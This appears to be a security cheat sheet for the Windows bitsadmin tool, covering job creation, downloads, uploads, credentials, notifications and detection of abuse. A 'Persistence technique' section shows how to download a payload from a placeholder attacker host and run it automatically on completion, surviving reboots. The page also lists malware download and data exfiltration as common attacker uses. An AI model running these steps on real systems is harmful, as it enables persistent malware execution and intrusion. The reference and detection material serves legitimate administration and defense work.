← All cheat sheets

BITSADMIN

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Interactive tool: LOLBin / GTFOBins Browser

Background Intelligent Transfer Service (BITS) Administration.
Used for file transfers; also commonly abused for downloads.

NOTE: PowerShell cmdlets (Start-BitsTransfer) are preferred.
BITS is often used by attackers due to its low profile.

BASIC OPERATIONS#


    

CREATE JOB#

bitsadmin /create jobname            # Create download job
bitsadmin /create /upload jobname    # Create upload job
bitsadmin /create /download jobname  # Explicit download

ADD FILES#

bitsadmin /addfile jobname http://url/file.exe C:\dest\file.exe
bitsadmin /addfile job http://url/file1.exe C:\file1.exe
bitsadmin /addfile job http://url/file2.exe C:\file2.exe

CONTROL JOB#

bitsadmin /resume jobname            # Start/resume transfer
bitsadmin /suspend jobname           # Pause transfer
bitsadmin /complete jobname          # Complete and save files
bitsadmin /cancel jobname            # Cancel and delete

MONITOR#

bitsadmin /list                      # List all jobs
bitsadmin /list /allusers            # All users' jobs
bitsadmin /list /verbose             # Detailed list
bitsadmin /info jobname              # Job info
bitsadmin /info jobname /verbose     # Detailed info
bitsadmin /monitor                   # Real-time monitoring
bitsadmin /monitor /allusers

QUICK FILE DOWNLOAD#

# One-liner download
bitsadmin /transfer jobname http://url/file.exe C:\dest\file.exe

# With priority
bitsadmin /transfer job /priority high http://url/file.exe C:\file.exe

# Download priority levels: FOREGROUND, HIGH, NORMAL, LOW

MULTI-FILE DOWNLOAD#

# Step by step
bitsadmin /create downloadjob
bitsadmin /addfile downloadjob http://url/file1.exe C:\file1.exe
bitsadmin /addfile downloadjob http://url/file2.exe C:\file2.exe
bitsadmin /resume downloadjob
bitsadmin /complete downloadjob

JOB SETTINGS#


    

PRIORITY#

bitsadmin /setpriority jobname FOREGROUND
bitsadmin /setpriority jobname HIGH
bitsadmin /setpriority jobname NORMAL
bitsadmin /setpriority jobname LOW

CREDENTIALS#

bitsadmin /setcredentials jobname SERVER BASIC user password
bitsadmin /setcredentials jobname PROXY BASIC user password

# Credential schemes: BASIC, DIGEST, NTLM, NEGOTIATE

PROXY#

bitsadmin /setproxysettings jobname OVERRIDE proxy:port
bitsadmin /setproxysettings jobname NO_PROXY
bitsadmin /setproxysettings jobname AUTODETECT

NOTIFICATIONS#

bitsadmin /setnotiycmdline jobname C:\script.bat ""
bitsadmin /setnotifyflags jobname 1   # Job transferred
bitsadmin /setnotifyflags jobname 2   # Job error
bitsadmin /setnotifyflags jobname 3   # Both

# On completion, run command
bitsadmin /setnotifycmdline jobname cmd.exe "/c C:\script.bat"

CUSTOM HEADERS#

bitsadmin /setcustomheaders jobname "Header1: Value1" "Header2: Value2"

RETRY SETTINGS#

bitsadmin /setnoprogresstimeout jobname 60
bitsadmin /setminretrydelay jobname 300

JOB STATE#

QUEUED                               # Job created, not started
CONNECTING                           # Connecting to server
TRANSFERRING                         # Transfer in progress
SUSPENDED                            # Paused
ERROR                                # Error occurred
TRANSIENT_ERROR                      # Temporary error
TRANSFERRED                          # Complete, needs /complete
ACKNOWLEDGED                         # Completed and saved
CANCELLED                            # Cancelled

TROUBLESHOOTING#

bitsadmin /getstate jobname          # Get job state
bitsadmin /geterror jobname          # Get error info
bitsadmin /getbytestotal jobname     # Total bytes
bitsadmin /getbytestransferred jobname
bitsadmin /getfilestotal jobname
bitsadmin /getfilestransferred jobname

RESET#

bitsadmin /reset                     # Cancel all jobs
bitsadmin /reset /allusers           # All users' jobs

CACHE#

bitsadmin /cache /info               # Cache info
bitsadmin /cache /clear              # Clear cache
bitsadmin /peercaching /getconfigurationflags

UPLOAD#

bitsadmin /create /upload uploadjob
bitsadmin /addfile uploadjob http://server/upload C:\local\file.exe
bitsadmin /setreplyfilename uploadjob C:\response.txt
bitsadmin /resume uploadjob

RAW DATA#

bitsadmin /rawreturn                 # Raw return data

SECURITY ANALYSIS#

# BITS is commonly used for:
# - Downloading malware (evades some detection)
# - Persistence via /setnotifycmdline
# - Data exfiltration via uploads
# - Command execution on completion

# Detection:
# - Monitor bitsadmin.exe execution
# - Check for unusual job names
# - Look for /transfer or /addfile to suspicious URLs
# - Check Event Logs: Microsoft-Windows-Bits-Client/Operational

# Find all BITS jobs
bitsadmin /list /allusers /verbose

# List jobs with file paths
for /f "tokens=3" %j in ('bitsadmin /list /allusers ^| findstr "GUID"') do @bitsadmin /info %j /verbose

PERSISTENCE TECHNIQUE#

# Create persistent download that runs command on completion
bitsadmin /create persist
bitsadmin /addfile persist http://attacker/payload.exe C:\Windows\Temp\payload.exe
bitsadmin /setnotifycmdline persist C:\Windows\Temp\payload.exe ""
bitsadmin /setminretrydelay persist 60
bitsadmin /resume persist

# Job persists across reboots until completed

POWERSHELL ALTERNATIVE#

# Start-BitsTransfer is the modern alternative
Start-BitsTransfer -Source http://url/file.exe -Destination C:\file.exe
Start-BitsTransfer -Source http://url/file.exe -Destination C:\file.exe -Asynchronous
Get-BitsTransfer                     # List jobs
Complete-BitsTransfer -BitsJob $job  # Complete job

QUICK REFERENCE#

# Quick download
bitsadmin /transfer job http://url/file.exe C:\dest\file.exe

# Multi-step download
bitsadmin /create jobname
bitsadmin /addfile jobname http://url/file.exe C:\file.exe
bitsadmin /resume jobname
bitsadmin /complete jobname

# Monitor
bitsadmin /list
bitsadmin /info jobname /verbose
bitsadmin /monitor

# Control
bitsadmin /resume jobname
bitsadmin /suspend jobname
bitsadmin /cancel jobname
bitsadmin /complete jobname

# Reset
bitsadmin /reset /allusers